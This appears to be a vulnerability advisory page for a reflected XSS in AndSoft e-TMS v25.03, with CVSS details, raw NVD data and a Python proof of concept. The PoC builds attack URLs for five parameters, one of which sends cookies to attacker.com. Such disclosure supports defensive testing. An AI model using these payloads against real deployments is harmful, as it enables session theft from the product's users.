Security Vulnerability Report
中文
CVE-2025-59760 CVSS 6.1 MEDIUM

CVE-2025-59760

Published: 2025-10-02 15:15:56
Last Modified: 2025-10-02 19:54:49

Description

Cross-site scripting (XSS) vulnerability reflected in AndSoft's e-TMS v25.03. This vulnerability allows an attacker to execute JavaScript code in the victim's browser by sending them a malicious URL. The relationship between parameter and assigned identifier is 'l, demo, demo2, TNTLOGIN, UO and SuppConn' parameters in '/clt/LOGINFRM_DHL.ASP'.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:andsoft:e-tms:25.03:*:*:*:*:*:*:* - VULNERABLE
AndSoft e-TMS v25.03

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59760 - AndSoft e-TMS Reflected XSS PoC # Vulnerable endpoint: /clt/LOGINFRM_DHL.ASP # Vulnerable parameters: l, demo, demo2, TNTLOGIN, UO, SuppConn import requests TARGET_URL = "https://target.example.com" VULNERABLE_ENDPOINT = "/clt/LOGINFRM_DHL.ASP" # PoC 1: Basic XSS using <script> tag via 'l' parameter def poc_script_tag(): payload = "<script>alert('XSS-CVE-2025-59760')</script>" url = f"{TARGET_URL}{VULNERABLE_ENDPOINT}?l={payload}" print(f"[+] PoC URL (script tag via 'l' param): {url}") return url # PoC 2: XSS using img onerror handler via 'demo' parameter def poc_img_onerror(): payload = "<img src=x onerror=alert('XSS-via-demo')>" url = f"{TARGET_URL}{VULNERABLE_ENDPOINT}?demo={payload}" print(f"[+] PoC URL (img onerror via 'demo' param): {url}") return url # PoC 3: XSS via 'TNTLOGIN' parameter with cookie exfiltration def poc_cookie_steal(): # Note: Replace 'attacker.com' with actual attacker-controlled server payload = "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>" url = f"{TARGET_URL}{VULNERABLE_ENDPOINT}?TNTLOGIN={payload}" print(f"[+] PoC URL (cookie steal via 'TNTLOGIN' param): {url}") return url # PoC 4: XSS via 'UO' parameter using event handler def poc_event_handler(): payload = "\" onmouseover=alert('XSS-UO') \"" url = f"{TARGET_URL}{VULNERABLE_ENDPOINT}?UO={payload}" print(f"[+] PoC URL (event handler via 'UO' param): {url}") return url # PoC 5: XSS via 'SuppConn' parameter def poc_suppconn(): payload = "<svg onload=alert('XSS-SuppConn')>" url = f"{TARGET_URL}{VULNERABLE_ENDPOINT}?SuppConn={payload}" print(f"[+] PoC URL (svg onload via 'SuppConn' param): {url}") return url # Verify vulnerability by sending request and checking reflection def verify_xss(target_url, param_name, payload): test_url = f"{target_url}{VULNERABLE_ENDPOINT}?{param_name}={payload}" try: response = requests.get(test_url, timeout=10, verify=False) if payload in response.text: print(f"[VULNERABLE] Payload reflected in response for parameter '{param_name}'") return True else: print(f"[NOT VULNERABLE] Payload not reflected for parameter '{param_name}'") return False except Exception as e: print(f"[ERROR] Request failed: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-59760 - AndSoft e-TMS Reflected XSS PoC") print("=" * 60) poc_script_tag() poc_img_onerror() poc_cookie_steal() poc_event_handler() poc_suppconn() print("\n[!] WARNING: Use only for authorized security testing.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59760", "sourceIdentifier": "[email protected]", "published": "2025-10-02T15:15:56.367", "lastModified": "2025-10-02T19:54:49.217", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-site scripting (XSS) vulnerability reflected in AndSoft's e-TMS v25.03. This vulnerability allows an attacker to execute JavaScript code in the victim's browser by sending them a malicious URL. The relationship between parameter and assigned identifier is 'l, demo, demo2, TNTLOGIN, UO and SuppConn' parameters in '/clt/LOGINFRM_DHL.ASP'."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:andsoft:e-tms:25.03:*:*:*:*:*:*:*", "matchCriteriaId": "DA9BDB99-4B85-46EF-A8EA-B0E7B1DCF276"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/update-24092025-multiple-vulnerabilities-andsofts-e-tms", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}